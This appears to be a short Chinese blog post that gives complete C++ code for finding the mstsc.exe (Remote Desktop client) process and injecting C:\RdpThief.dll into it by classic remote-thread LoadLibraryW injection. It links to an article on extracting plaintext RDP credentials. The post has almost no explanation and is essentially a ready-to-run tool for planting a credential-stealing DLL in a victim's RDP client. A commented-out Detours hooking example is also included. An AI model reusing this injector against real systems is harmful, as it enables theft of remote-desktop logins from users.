dll注入 c++

进程名搜索pid,然后向对应pid进程注入dll

// detourstest.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include "Windows.h"
#include <detours.h>
#include <string.h>
#include <tlhelp32.h>
#pragma comment (lib,"detours.lib")

#define ArraySize(ptr)    (sizeof(ptr) / sizeof(ptr[0]))
/*
static int(WINAPI *TrueMessageBox)(HWND, LPCTSTR, LPCTSTR, UINT) = MessageBox;
int WINAPI OurMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
	return TrueMessageBox(NULL, L"Hooked", lpCaption, 0);
}
int main()
{
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourAttach(&(PVOID&)TrueMessageBox, OurMessageBox);
	DetourTransactionCommit();
	MessageBox(NULL, L"Hello", L"Hello", 0);
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourDetach(&(PVOID&)TrueMessageBox, OurMessageBox);
	DetourTransactionCommit();
}
*/


BOOL FindProcessPid(LPCWSTR ProcessName, DWORD& dwPid);


int main()
{
	LPCWSTR Name = L"mstsc.exe";
	// StopMyService();
	DWORD dwPid = 0;
	HANDLE ProcessHandle;
	PVOID RemoteBuffer;
	wchar_t DllPath[] = TEXT("C:\\RdpThief.dll");




	if (FindProcessPid(Name, dwPid))
	{
		//printf("[%ls] [%d]\n",Name, dwPid);
		ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
		RemoteBuffer = VirtualAllocEx(ProcessHandle, NULL, sizeof DllPath, MEM_COMMIT, PAGE_READWRITE);
		WriteProcessMemory(ProcessHandle, RemoteBuffer, (LPVOID)DllPath, sizeof DllPath, NULL);
		PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
		CreateRemoteThread(ProcessHandle, NULL, 0, threatStartRoutineAddress, RemoteBuffer, 0, NULL);
		CloseHandle(ProcessHandle);

	}
	else
	{
		printf("[%ls] [Not Found]\n", Name);
	}
	
	return 0;
}

BOOL FindProcessPid(LPCWSTR ProcessName, DWORD& dwPid)
{
	HANDLE hProcessSnap;
	PROCESSENTRY32 pe32;

	// Take a snapshot of all processes in the system.
	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE)
	{
		return(FALSE);
	}

	pe32.dwSize = sizeof(PROCESSENTRY32);

	if (!Process32First(hProcessSnap, &pe32))
	{
		CloseHandle(hProcessSnap);          // clean the snapshot object
		return(FALSE);
	}

	BOOL    bRet = FALSE;
	do
	{
		if (!lstrcmp(ProcessName, pe32.szExeFile))
		{
			dwPid = pe32.th32ProcessID;
			bRet = TRUE;
			break;
		}

	} while (Process32Next(hProcessSnap, &pe32));

	CloseHandle(hProcessSnap);
	return bRet;
}

https://www.c0bra.xyz/2019/12/24/mstsc%E4%B8%AD%E6%8F%90%E5%8F%96%E6%98%8E%E6%96%87%E5%87%AD%E6%8D%AE-RdpThief%E5%AE%9E%E8%B7%B5/

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值